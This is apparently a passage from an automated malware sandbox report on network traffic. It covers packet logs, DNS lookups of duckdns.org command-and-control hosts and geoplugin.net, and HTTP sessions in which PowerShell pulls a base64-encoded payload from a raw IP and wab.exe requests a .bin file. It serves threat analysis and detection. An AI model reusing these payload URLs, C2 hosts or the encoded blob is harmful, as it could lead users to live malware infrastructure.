                                                                              May 2, 2024 17:22:04.069436073 CEST4975480192.168.2.4178.237.33.50
                                                                              May 2, 2024 17:22:04.236486912 CEST8049754178.237.33.50192.168.2.4
                                                                              May 2, 2024 17:22:04.236829996 CEST4975480192.168.2.4178.237.33.50
                                                                              May 2, 2024 17:22:04.237040043 CEST4975480192.168.2.4178.237.33.50
                                                                              May 2, 2024 17:22:04.409076929 CEST8049754178.237.33.50192.168.2.4
                                                                              May 2, 2024 17:22:04.409657955 CEST4975480192.168.2.4178.237.33.50
                                                                              May 2, 2024 17:22:04.431658983 CEST497533050192.168.2.445.88.90.110
                                                                              May 2, 2024 17:22:04.642013073 CEST30504975345.88.90.110192.168.2.4
                                                                              May 2, 2024 17:22:05.410670996 CEST8049754178.237.33.50192.168.2.4
                                                                              May 2, 2024 17:22:05.410752058 CEST4975480192.168.2.4178.237.33.50
                                                                              May 2, 2024 17:22:10.180506945 CEST4972480192.168.2.423.33.40.21
                                                                              May 2, 2024 17:22:10.269186020 CEST804972423.33.40.21192.168.2.4
                                                                              May 2, 2024 17:22:10.269253969 CEST4972480192.168.2.423.33.40.21
                                                                              May 2, 2024 17:22:14.470976114 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:14.471004009 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:14.471069098 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:14.471524000 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:14.471534967 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:14.659343958 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:14.659636974 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:14.659665108 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:14.659959078 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:14.660243034 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:14.660301924 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:14.709806919 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:24.657505989 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:24.657579899 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:24.657747984 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:25.312180042 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:25.312248945 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:30.893359900 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:22:31.997128963 CEST30504975345.88.90.110192.168.2.4
                                                                              May 2, 2024 17:22:31.999084949 CEST497533050192.168.2.445.88.90.110
                                                                              May 2, 2024 17:22:32.204405069 CEST30504975345.88.90.110192.168.2.4
                                                                              May 2, 2024 17:23:02.391897917 CEST30504975345.88.90.110192.168.2.4
                                                                              May 2, 2024 17:23:02.394167900 CEST497533050192.168.2.445.88.90.110
                                                                              May 2, 2024 17:23:02.610630035 CEST30504975345.88.90.110192.168.2.4

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              May 2, 2024 17:21:14.986474991 CEST6502753192.168.2.41.1.1.1
                                                                              May 2, 2024 17:21:14.986624002 CEST6259053192.168.2.41.1.1.1
                                                                              May 2, 2024 17:21:15.071367979 CEST53499031.1.1.1192.168.2.4
                                                                              May 2, 2024 17:21:15.074764967 CEST53650271.1.1.1192.168.2.4
                                                                              May 2, 2024 17:21:15.075894117 CEST53625901.1.1.1192.168.2.4
                                                                              May 2, 2024 17:21:15.119060993 CEST53511791.1.1.1192.168.2.4
                                                                              May 2, 2024 17:21:15.146805048 CEST6113753192.168.2.48.8.8.8
                                                                              May 2, 2024 17:21:15.147078037 CEST5111953192.168.2.41.1.1.1
                                                                              May 2, 2024 17:21:15.234682083 CEST53611378.8.8.8192.168.2.4
                                                                              May 2, 2024 17:21:15.235089064 CEST53511191.1.1.1192.168.2.4
                                                                              May 2, 2024 17:21:15.874007940 CEST53568671.1.1.1192.168.2.4
                                                                              May 2, 2024 17:21:22.704431057 CEST138138192.168.2.4192.168.2.255
                                                                              May 2, 2024 17:21:32.935933113 CEST53585701.1.1.1192.168.2.4
                                                                              May 2, 2024 17:21:51.998471975 CEST5345753192.168.2.41.1.1.1
                                                                              May 2, 2024 17:21:52.523686886 CEST53534571.1.1.1192.168.2.4
                                                                              May 2, 2024 17:21:52.994494915 CEST53578531.1.1.1192.168.2.4
                                                                              May 2, 2024 17:21:53.363091946 CEST5045053192.168.2.41.1.1.1
                                                                              May 2, 2024 17:21:53.992741108 CEST53504501.1.1.1192.168.2.4
                                                                              May 2, 2024 17:22:00.057964087 CEST5556153192.168.2.41.1.1.1
                                                                              May 2, 2024 17:22:00.161530972 CEST53555611.1.1.1192.168.2.4
                                                                              May 2, 2024 17:22:03.353615999 CEST5913553192.168.2.41.1.1.1
                                                                              May 2, 2024 17:22:03.463221073 CEST53591351.1.1.1192.168.2.4
                                                                              May 2, 2024 17:22:03.976744890 CEST6269653192.168.2.41.1.1.1
                                                                              May 2, 2024 17:22:04.066657066 CEST53626961.1.1.1192.168.2.4
                                                                              May 2, 2024 17:22:14.495629072 CEST53547531.1.1.1192.168.2.4
                                                                              May 2, 2024 17:22:18.534420013 CEST53591601.1.1.1192.168.2.4
                                                                              May 2, 2024 17:22:27.888748884 CEST6496953192.168.2.41.1.1.1
                                                                              May 2, 2024 17:22:27.979629993 CEST53649691.1.1.1192.168.2.4
                                                                              May 2, 2024 17:22:42.901709080 CEST53636351.1.1.1192.168.2.4
                                                                              May 2, 2024 17:22:57.905337095 CEST5454053192.168.2.41.1.1.1
                                                                              May 2, 2024 17:22:57.995158911 CEST53545401.1.1.1192.168.2.4

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              May 2, 2024 17:21:14.986474991 CEST192.168.2.41.1.1.10x7a1fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:21:14.986624002 CEST192.168.2.41.1.1.10x213dStandard query (0)www.google.com65IN (0x0001)false
                                                                              May 2, 2024 17:21:15.146805048 CEST192.168.2.48.8.8.80x84f6Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:21:15.147078037 CEST192.168.2.41.1.1.10x965bStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:21:51.998471975 CEST192.168.2.41.1.1.10x59d9Standard query (0)duelvalenza.itA (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:21:53.363091946 CEST192.168.2.41.1.1.10x9369Standard query (0)www.duelvalenza.itA (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:22:00.057964087 CEST192.168.2.41.1.1.10x9855Standard query (0)jgbours284hawara01.duckdns.orgA (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:22:03.353615999 CEST192.168.2.41.1.1.10xab5aStandard query (0)jgbours284hawara02.duckdns.orgA (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:22:03.976744890 CEST192.168.2.41.1.1.10xcacfStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:22:27.888748884 CEST192.168.2.41.1.1.10x1864Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:22:57.905337095 CEST192.168.2.41.1.1.10x499aStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              May 2, 2024 17:21:15.074764967 CEST1.1.1.1192.168.2.40x7a1fNo error (0)www.google.com142.250.80.68A (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:21:15.075894117 CEST1.1.1.1192.168.2.40x213dNo error (0)www.google.com65IN (0x0001)false
                                                                              May 2, 2024 17:21:15.234682083 CEST8.8.8.8192.168.2.40x84f6No error (0)google.com142.251.41.78A (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:21:15.235089064 CEST1.1.1.1192.168.2.40x965bNo error (0)google.com142.251.40.174A (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:21:52.523686886 CEST1.1.1.1192.168.2.40x59d9No error (0)duelvalenza.it46.254.34.12A (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:21:53.992741108 CEST1.1.1.1192.168.2.40x9369No error (0)www.duelvalenza.itduelvalenza.itCNAME (Canonical name)IN (0x0001)false
                                                                              May 2, 2024 17:21:53.992741108 CEST1.1.1.1192.168.2.40x9369No error (0)duelvalenza.it46.254.34.12A (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:22:00.161530972 CEST1.1.1.1192.168.2.40x9855No error (0)jgbours284hawara01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:22:03.463221073 CEST1.1.1.1192.168.2.40xab5aNo error (0)jgbours284hawara02.duckdns.org45.88.90.110A (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:22:04.066657066 CEST1.1.1.1192.168.2.40xcacfNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:22:27.979629993 CEST1.1.1.1192.168.2.40x1864No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                              May 2, 2024 17:22:57.995158911 CEST1.1.1.1192.168.2.40x499aNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • slscr.update.microsoft.com
                                                                              • duelvalenza.it
                                                                              • 87.121.105.163
                                                                              • www.duelvalenza.it
                                                                              • geoplugin.net

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.44973087.121.105.163807504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 2, 2024 17:20:57.851933002 CEST173OUTGET /Terminaljob.toc HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Host: 87.121.105.163
                                                                              Connection: Keep-Alive
                                                                              May 2, 2024 17:20:58.019577980 CEST1289INHTTP/1.1 200 OK
                                                                              Date: Thu, 02 May 2024 15:20:57 GMT
                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                              Last-Modified: Tue, 30 Apr 2024 00:51:09 GMT
                                                                              ETag: "6a170-61745c4035940"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 434544
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Data Raw: 36 77 4c 55 56 58 45 42 6d 37 76 30 58 51 77 41 63 51 47 62 36 77 4a 4f 58 41 4e 63 4a 41 54 72 41 6e 51 45 63 51 47 62 75 55 51 67 53 33 2f 72 41 68 44 54 63 51 47 62 67 63 45 70 6f 65 58 48 36 77 4a 70 7a 58 45 42 6d 34 48 70 62 63 45 77 52 2b 73 43 75 79 44 72 41 6f 6e 37 36 77 4a 30 31 4f 73 43 46 31 2b 36 4a 61 30 72 6d 6e 45 42 6d 33 45 42 6d 33 45 42 6d 33 45 42 6d 7a 48 4b 36 77 4a 64 44 65 73 43 72 50 61 4a 46 41 74 78 41 5a 76 72 41 76 62 30 30 65 4c 72 41 6d 36 33 63 51 47 62 67 38 45 45 36 77 4a 51 6c 65 73 43 4c 31 69 42 2b 63 77 6b 55 67 46 38 79 6e 45 42 6d 2b 73 43 78 68 36 4c 52 43 51 45 36 77 4a 77 4f 6e 45 42 6d 34 6e 44 36 77 4c 73 7a 4f 73 43 30 6b 79 42 77 77 4f 36 6a 51 42 78 41 5a 74 78 41 5a 75 36 53 53 77 59 77 4f 73 43 61 4d 4e 78 41 5a 75 42 38 6c 6b 6c 33 36 37 72 41 71 77 75 36 77 49 4e 49 34 48 43 38 50 59 34 6b 65 73 43 54 2b 54 72 41 67 2b 6f 36 77 49 49 4a 33 45 42 6d 33 45 42 6d 33 45 42 6d 34 73 4d 45 4f 73 43 4c 69 78 78 41 5a 75 4a 44 42 50 72 41 67 45 49 36 77 [TRUNCATED]
                                                                              Data Ascii: 6wLUVXEBm7v0XQwAcQGb6wJOXANcJATrAnQEcQGbuUQgS3/rAhDTcQGbgcEpoeXH6wJpzXEBm4HpbcEwR+sCuyDrAon76wJ01OsCF1+6Ja0rmnEBm3EBm3EBm3EBmzHK6wJdDesCrPaJFAtxAZvrAvb00eLrAm63cQGbg8EE6wJQlesCL1iB+cwkUgF8ynEBm+sCxh6LRCQE6wJwOnEBm4nD6wLszOsC0kyBwwO6jQBxAZtxAZu6SSwYwOsCaMNxAZuB8lkl367rAqwu6wINI4HC8PY4kesCT+TrAg+o6wIIJ3EBm3EBm3EBm4sMEOsCLixxAZuJDBPrAgEI6wIbtULrAr5McQGbgfqsjQQAddVxAZtxAZuJXCQMcQGbcQGbge0AAwAA6wKNtOsCXS2LVCQIcQGb6wJjXYt8JATrAjKG6wIKbInrcQGb6wLppIHDnAAAAHEBm3EBm1NxAZtxAZtqQHEBm+sCH1aJ63EBm3EBm8eDAAEAAACQYQHrAqz96wKhnIHDAAEAAHEBm3EBm1PrApoL6wJc+onrcQGb6wL7rIm7BAEAAOsCmLDrAkvogcMEAQAAcQGbcQGbU+sCxvlxAZtq/+sC7FbrAujtg8IF6wIpi+sCNfox9nEBm+sCUSYxyesC2R9xAZuLGnEBm3EBm0FxAZtxAZs5HAp19OsCHQlxAZtGcQGb6wKLrIB8Cvu4dd5xAZvrAsDIi0QK/HEBm+sCQ3sp8OsCq1ZxAZv/0nEBm3EBm7qsjQQAcQGbcQGbMcDrAkg06wLBzYt8JAxxAZtxAZuBNAcXTENl6wJO2OsC7q6DwATrAmDQ6wKydznQdeJxAZvrAvuVifvrAkza6wLgof/XcQGb6wId5S+Gwp/wj0lwL5/KgJ4Zm99naxPZlo50nUZawpfAgzuLlr4zts1warGcGZswnqn6X0oEdOTmhtDalMy++pa9zZY1Cnu9lr0lWMK+FNqB45xulrP9ZRdMTOmnNkdlSIsHaBel6u7AzTdo [TRUNCATED]
                                                                              May 2, 2024 17:20:58.019593000 CEST1289INData Raw: 79 59 76 6b 65 30 46 44 50 41 55 6a 44 2b 52 37 51 55 4f 45 45 75 69 74 34 66 6c 30 69 2b 54 57 62 35 72 56 46 4d 32 71 65 73 37 38 51 4f 79 61 2b 30 4a 6c 46 37 75 45 72 4c 7a 6c 43 39 7a 50 31 31 41 45 6c 72 32 79 50 44 48 50 74 61 59 4b 7a 62
                                                                              Data Ascii: yYvke0FDPAUjD+R7QUOEEuit4fl0i+TWb5rVFM2qes78QOya+0JlF7uErLzlC9zP11AElr2yPDHPtaYKzbJD7EEBjgnHhE8zK4G0BXwr/l2VTjZbQRl7cMkXmo7lgwRQbgDk/tt0Xbcf+CMXTEPk7Mt3qBtDzERtSEM+LsH0ZBdMyOigTUNlGMkcmuizxrxxu4UIDCrCm4aleryeyTtkF0zCGGOX92UXQ8fni0xD4dTF3ikWTEM
                                                                              May 2, 2024 17:20:58.019803047 CEST1289INData Raw: 6d 57 74 4a 4d 64 7a 31 70 74 4f 4f 65 41 48 37 61 6b 74 42 4f 65 42 78 59 45 33 6e 4e 6b 55 5a 78 64 4d 71 35 55 73 54 6b 4d 4e 67 7a 47 30 35 35 5a 34 5a 34 61 44 33 30 66 6b 49 32 67 69 2b 4a 4f 2f 46 4e 72 2b 74 72 67 36 6c 71 4e 5a 51 76 46
                                                                              Data Ascii: mWtJMdz1ptOOeAH7aktBOeBxYE3nNkUZxdMq5UsTkMNgzG055Z4Z4aD30fkI2gi+JO/FNr+trg6lqNZQvFrworYDXJFlqNRZPNbymo1SKiGr6f28mhZ8UVArpYQgJb8vQ9LS4l6Xe76wbh0OpZIZ46cU8mNQBxHZZjJx2UXTMjok0xDZa0KoWFdQ0tiMExD008MWV4x89oBEsPAtXbnDRXTCqMLlllz0tOnzwaAG0cJ/sxdi5vh
                                                                              May 2, 2024 17:20:58.019817114 CEST1289INData Raw: 6a 51 35 30 31 44 5a 52 68 45 47 59 49 58 54 4d 78 4e 6b 57 68 59 68 39 57 79 34 56 75 4a 61 79 44 6f 37 70 55 55 32 76 7a 57 78 4c 4b 57 69 38 52 62 62 51 76 43 69 6c 75 4b 50 48 69 57 69 39 41 6d 33 59 58 43 69 70 38 62 43 4b 36 65 53 36 45 41
                                                                              Data Ascii: jQ501DZRhEGYIXTMxNkWhYh9Wy4VuJayDo7pUU2vzWxLKWi8RbbQvCiluKPHiWi9Am3YXCip8bCK6eS6EAEm/q1cG4PBL/R3982tXCXJVELH0Bvi+tmCij+BnTunHLN6I2ejOSTkDliiJIJMw3AvQrWDosZDSuo1vaU82yrOd6I+Tmt9LsM8V6gt5yrvEOPPz3yOQa5BNoPvaeSMJRMzqkI4se+UriuETk1VL+XqrNqSimfIY2i
                                                                              May 2, 2024 17:20:58.019881964 CEST1289INData Raw: 37 6f 34 36 44 7a 61 6b 38 78 34 79 6d 35 4f 57 4e 74 41 6c 59 7a 59 47 6d 7a 50 52 63 37 41 56 41 62 7a 54 35 39 38 30 66 68 6f 6b 41 5a 7a 58 53 2f 2f 74 42 49 4a 69 50 44 75 6d 38 4f 69 36 57 6d 4e 4d 4a 32 5a 53 52 67 42 62 43 70 2f 37 2b 4b
                                                                              Data Ascii: 7o46Dzak8x4ym5OWNtAlYzYGmzPRc7AVAbzT5980fhokAZzXS//tBIJiPDum8Oi6WmNMJ2ZSRgBbCp/7+KR9FQ0N3W0xD41i4wciQaCEGx6FAY8Prut8q3w7gPHDfIJzZ0WQXTBXbPbBtf5aKN5nRXMKTSwMh8JaKfSx/DBP5nqxCVYoqeqRqbJ9gezr8cRvpv/TYs7KuB1dUiVPQyYmvXO++2FIU+K4uK0OmjHuAT3HTsgMPHa
                                                                              May 2, 2024 17:20:58.019896030 CEST1289INData Raw: 37 68 44 58 35 71 57 76 53 50 72 73 34 58 52 6f 76 4a 58 6a 48 4f 76 6e 75 43 61 51 65 5a 41 39 2f 2f 41 41 59 52 63 63 2b 32 43 74 55 4a 35 49 72 79 59 66 5a 43 4c 4f 7a 70 30 76 59 57 67 6f 4c 76 46 75 77 57 4f 7a 5a 6a 4f 4c 78 61 56 73 45 64
                                                                              Data Ascii: 7hDX5qWvSPrs4XRovJXjHOvnuCaQeZA9//AAYRcc+2CtUJ5IryYfZCLOzp0vYWgoLvFuwWOzZjOLxaVsEdF6tm5a63VyS8N6+wIA0c08p7iKHs8tjflIqbzIgztxu4WfBRT9JaQRETasOmuX1c2wvaKShuTUdcnfAc2oIgKDR+T8HRVyDsVQbvwHe9H8ALpr1ySlPOch4rePtlruStglgxRwb8HxoxrPytnabH0suNZaGhhq0Hs
                                                                              May 2, 2024 17:20:58.019946098 CEST1289INData Raw: 51 58 57 61 4d 70 6a 44 74 62 4a 4a 49 57 41 49 61 35 33 45 73 4a 4a 4d 36 50 6c 31 33 30 62 2f 4c 43 57 75 30 2f 6b 34 46 6a 53 6b 6b 54 4e 74 49 56 75 2f 30 4c 6b 2b 4a 41 4c 31 6b 6e 46 56 41 2b 35 4d 53 58 64 41 6a 4f 6f 64 65 42 69 6a 58 78
                                                                              Data Ascii: QXWaMpjDtbJJIWAIa53EsJJM6Pl130b/LCWu0/k4FjSkkTNtIVu/0Lk+JAL1knFVA+5MSXdAjOodeBijXxv/aDDwUEj3ri2h9HzEL83CIgc7IJ3QWUXQ0J0XkxD21nIdyL+PmTFd+kDFckirpRTbzWkY3fFZ8xYljMbWmN9nrYR7oJ3QWUXGv1DVRsr5OFd6kj6zbWVr5pU5OGLEcmFHN/s901z+C+HOGs3fvu/nP363GabC2Zk
                                                                              May 2, 2024 17:20:58.019958973 CEST1289INData Raw: 6b 4b 54 4f 2f 69 38 77 75 4e 41 46 69 4d 43 7a 71 6c 4f 6a 6c 34 62 56 33 44 6c 4d 53 66 4e 59 4d 69 38 5a 70 36 33 51 4f 57 7a 58 64 42 59 6c 62 61 74 55 48 79 71 70 37 66 6a 73 4b 4c 61 55 55 67 6f 4a 61 36 55 53 66 70 30 73 4b 6a 6b 42 77 6e
                                                                              Data Ascii: kKTO/i8wuNAFiMCzqlOjl4bV3DlMSfNYMi8Zp63QOWzXdBYlbatUHyqp7fjsKLaUUgoJa6USfp0sKjkBwn+UfQyoUWfN4DLro2a8plz7CoFgtBX1vaOK1Sx8CF8BWRa735LRNKix3eTGzYQ6peWZTx72UXTGtqk9LIZRcUx6dJzXdBJK9zNZZ4Z3ZO5LE1r6+OLx1hw5HKDHZg5J4ySHFl/d1F0MqHHk7eA5KeOWFGDtANrm7m9
                                                                              May 2, 2024 17:20:58.019995928 CEST1289INData Raw: 68 2f 33 6f 53 6e 68 52 47 61 68 5a 37 7a 57 55 58 35 39 54 39 4a 36 39 66 53 39 70 30 71 6b 71 64 48 54 77 56 57 30 41 4b 58 33 5a 69 4c 78 4c 67 6c 56 57 46 49 30 78 6d 64 72 2b 78 6d 72 5a 53 57 37 50 44 52 58 45 35 62 34 32 41 68 49 68 6c 76
                                                                              Data Ascii: h/3oSnhRGahZ7zWUX59T9J69fS9p0qkqdHTwVW0AKX3ZiLxLglVWFI0xmdr+xmrZSW7PDRXE5b42AhIhlv+TWSw5hYwJcJBri9KibRW9x9u+mwWLWnXbq1z11uPV61v4vcHgyqHa40LLNtBKqlY3k4AEECXwa3+zxRX34Lo8wQidAeWClNMggCUKrQIZp8NWWfQbrj6pzjnmTd8ddeemdxeCO9SG36qdbHvklF0xD5O2Kq102Q8
                                                                              May 2, 2024 17:20:58.020028114 CEST1289INData Raw: 7a 53 50 4e 73 6a 67 34 2b 6c 50 6b 2f 6a 73 65 31 51 41 66 2b 44 65 4b 47 54 48 6b 35 46 54 58 74 78 72 4e 73 4e 6e 46 79 7a 7a 73 4c 4b 4a 66 4a 4f 72 38 71 57 6d 45 6a 41 6e 73 41 51 33 33 67 6d 79 4f 37 61 49 30 41 59 51 2b 5a 41 31 59 6c 4d
                                                                              Data Ascii: zSPNsjg4+lPk/jse1QAf+DeKGTHk5FTXtxrNsNnFyzzsLKJfJOr8qWmEjAnsAQ33gmyO7aI0AYQ+ZA1YlM69Ol6pfsYfOO804kwdyOhiTkNlnslLZxdM+5mgJ381r1Vi45ZhaKRM1Ha1SKy9UIXxiXKeTHLQkw799n6vlyKiZzQp1c0cAlA7UlNKRUuie2eNPyw4er3+F7E9IlMFLWthKgXfRUbjeeiKNZzJS2cXTMrQP05DZal
                                                                              May 2, 2024 17:20:58.186374903 CEST1289INData Raw: 6b 4e 6c 6e 71 38 51 37 6f 70 77 51 57 55 58 51 30 4b 57 53 45 78 44 30 70 70 6f 67 6a 77 43 59 59 70 4f 46 69 6c 33 78 7a 6e 33 51 47 6f 37 6d 6f 4a 59 78 58 65 6b 2f 59 4d 36 6a 31 45 4a 58 74 64 30 57 52 62 58 4f 6b 43 51 50 2b 79 61 32 6b 4a
                                                                              Data Ascii: kNlnq8Q7opwQWUXQ0KWSExD0ppogjwCYYpOFil3xzn3QGo7moJYxXek/YM6j1EJXtd0WRbXOkCQP+ya2kJlF8WaNJzB1WQXTI9hK/jnYaX/hUH8AvUztwvcB7psiP6Y7ouUf8V9KtJTECHLKLhFMpoSaBSzkz2e2RNnF0wQ3i2OW7uWv23S6xvClgM4p+xB0MqDHlLe4O0wSk2smMvt7zFlD/PF+29VByXgzBLGtUz2HEy4s488


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.44974846.254.34.12808872C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 2, 2024 17:21:54.182235956 CEST207OUTGET /wnnSAFMWPwDXGy95.bin HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Cache-Control: no-cache
                                                                              Host: www.duelvalenza.it
                                                                              Connection: Keep-Alive
                                                                              May 2, 2024 17:21:54.369524002 CEST592INHTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 02 May 2024 15:21:54 GMT
                                                                              Server: Apache
                                                                              Location: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/
                                                                              Cache-Control: max-age=1800
                                                                              Expires: Thu, 02 May 2024 15:51:54 GMT
                                                                              Content-Length: 255
                                                                              Keep-Alive: timeout=1, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 75 65 6c 76 61 6c 65 6e 7a 61 2e 69 74 2f 77 6e 6e 53 41 46 4d 57 50 77 44 58 47 79 39 35 2e 62 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/">here</a>.</p></body></html>
                                                                              May 2, 2024 17:21:54.369935989 CEST208OUTGET /wnnSAFMWPwDXGy95.bin/ HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Cache-Control: no-cache
                                                                              Host: www.duelvalenza.it
                                                                              Connection: Keep-Alive
                                                                              May 2, 2024 17:21:54.579665899 CEST1289INHTTP/1.1 404 Not Found
                                                                              Date: Thu, 02 May 2024 15:21:54 GMT
                                                                              Server: Apache
                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                              Cache-Control: post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              Set-Cookie: PHPSESSID=d979cfhj3obh8us97avdsfs160; path=/
                                                                              Set-Cookie: FrontSession=3c980817fa90cc22daee2c4e083b8971; expires=Thu, 02-May-2024 19:21:54 GMT; Max-Age=14400; path=/
                                                                              Set-Cookie: FrontSession=7d75569e99f6cec2e2439fa4dd313439; expires=Thu, 02-May-2024 19:21:54 GMT; Max-Age=14400; path=/
                                                                              Last-Modified: Thu, 02 May 2024 15:21:54 GMT
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: private, must-revalidate
                                                                              Keep-Alive: timeout=1, max=99
                                                                              Connection: Keep-Alive
                                                                              Transfer-Encoding: chunked
                                                                              Content-Type: text/html;charset=UTF-8
                                                                              Data Raw: 33 30 34 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 20 63 6c 61 73 73 3d 64 6f 63 75 6d 65 6e 74 2d 6c 6f 61 64 69 6e 67 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 20 2f 3e 3c 6d 65 74 61 20 63 6c 61 73 73 3d 76 69 65 77 70 6f 72 74 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d 22 [TRUNCATED]
                                                                              Data Ascii: 3045<!DOCTYPE html><html lang=en class=document-loading><head><meta charset=UTF-8 /><meta class=viewport name=viewport content="width=device-width, initial-scale=1.0" /><meta name=format-detection content="telephone=no" /><meta http-equiv=X-UA-Compatible content="IE=edge" /><title>Page not found</title><meta name=description content="" /><meta property="og:title" content="Page not found" /><meta property="og:description" content="" /><meta property="og:url" content="http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/" /><meta property="og:locale" content=en_EN /><meta prope
